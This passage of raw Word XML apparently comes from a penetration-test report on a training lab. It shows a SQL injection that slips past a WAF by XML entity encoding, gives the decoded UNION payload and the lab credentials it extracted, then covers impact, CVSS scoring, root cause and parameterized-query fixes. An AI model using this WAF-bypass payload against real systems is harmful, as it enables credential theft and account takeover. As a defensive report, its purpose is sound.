      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;#x70;&amp;#x61;&amp;#x73;&amp;#x73;&amp;#x77;&amp;#x6f;&amp;#x72;&amp;#x64;&amp;#x20;&amp;#x46;&amp;#x52;&amp;#x4f;&amp;#x4d;&amp;#x20;&amp;#x75;&amp;#x73;&amp;#x65;&amp;#x72;&amp;#x73;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Decodes to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">1 UNION SELECT username||'~'||password FROM users</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Response (excerpt):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">wiener~pzc47q7pryrypj170wir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">carlos~0k9s49vcjy86bf0q81gm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">administrator~ovuzrz65kqmc8zpbae2l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">927 units</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The administrator password was extracted and used to log in, confirming complete account takeover. The lab "Congratulations, you solved the lab!" banner was returned upon successful authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1  Business Impact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000"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Impact Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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20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r>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Credential Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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All user passwords extracted in plaintext. Every account in the database — including administrator — is immediately compromised.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trP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Account Takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Administrator credentials confirmed working. Full application takeover achievable without further exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Data Breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Complete exfiltration of the users table. Depending on production data, this may include PII, financial data, or other sensitive records.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trP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WAF Circumvention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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The deployed WAF provides zero protection against this attack. Its presence creates false confidence and may delay remediation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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If password reuse applies (common), the leaked credentials enable compromise of external accounts belonging to affected users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2  CVSS v3.1 Breakdown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200"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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16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52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Rationale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Attack Vector (AV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Network (N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Exploitable remotely over HTTP — no local access required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trP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Attack Complexity (AC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Low (L)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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 special conditions; the technique is well-documented and reliable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Privileges Required (PR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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None (N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Unauthenticated endpoint — any external attacker can exploit it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trP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User Interaction (UI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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None (N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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 victim interaction required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Scope (S)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Unchanged (U)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Impact contained within the web application boundary.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trP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Confidentiality (C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Full read access to all database tables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Integrity (I)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="52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Account takeover enables arbitrary data modification as administrator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trP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Availability (A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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None (N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="52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 DoS component identified in this attack path.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="922B21"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Final CVSS v3.1 Base Score: 9.1 — CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Root Cause Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Two independent weaknesses combine to produce this critical vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary — Untrusted Input Concatenated into SQL (CWE-89):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The application constructs the SQL query by directly inserting the user-supplied &lt;storeId&gt; value into the query string. There is no use of parameterized queries or prepared statements. Any input that reaches the database is treated as SQL code rather than data, making SQL injection inherently possible regardless of any upstream filtering.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Secondary — WAF Inspection Occurs Before XML Decoding (CWE-116 / Parser Differential):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The WAF inspects the raw HTTP request bytes. The application subsequently passes the request body through an XML parser, which decodes entity references. Because the WAF and the XML parser operate on different representations of the same input, encoding the payload as entity references creates a blind spot in WAF coverage. This is a known class of WAF bypass and is not specific to this application.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Contributing Factor — Plaintext Password Storage:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Credentials in the users table are stored in cleartext. A properly hashed and salted password store (bcrypt, Argon2) would prevent extracted hashes from being immediately usable, adding a meaningful layer of defence-in-depth.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1  Required Fixes (resolve the root cause)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000"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="2C3E50" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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P1 — CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Replace all string-concatenated SQL queries with parameterized queries / prepared statements. This eliminates SQL injection regardless of input encoding or WAF configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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P1 — CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Validate and enforce strict type constraints on &lt;storeId&gt;: it should be an integer. Reject any value that does not match /^[0-9]+$/ before it touches the database layer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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P2 — HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Hash all stored passwords using a strong adaptive algorithm (bcrypt cost ≥12, or Argon2id). Never store plaintext credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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P3 — MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Canonicalize / decode all user input before WAF inspection (input normalization). This ensures the WAF sees the same representation as the application, closing the parser-differential blind spot.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="F2F2F2" w:color="auto"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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P4 — LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Apply least-privilege to the database account used by the application. The account should have SELECT/INSERT/UPDATE only on the tables it requires — not SELECT on users from a stock-check context.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2  Secure Code Example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace unsafe query construction:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// UNSAFE — concatenates user input directly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const q = "SELECT stock FROM products WHERE store_id = " + storeId;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With a parameterized query:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// SAFE — user input is bound as a parameter, never parsed as SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const q = "SELECT stock FROM products WHERE store_id = $1";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const result = await db.query(q, [parseInt(storeId, 10)]);</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
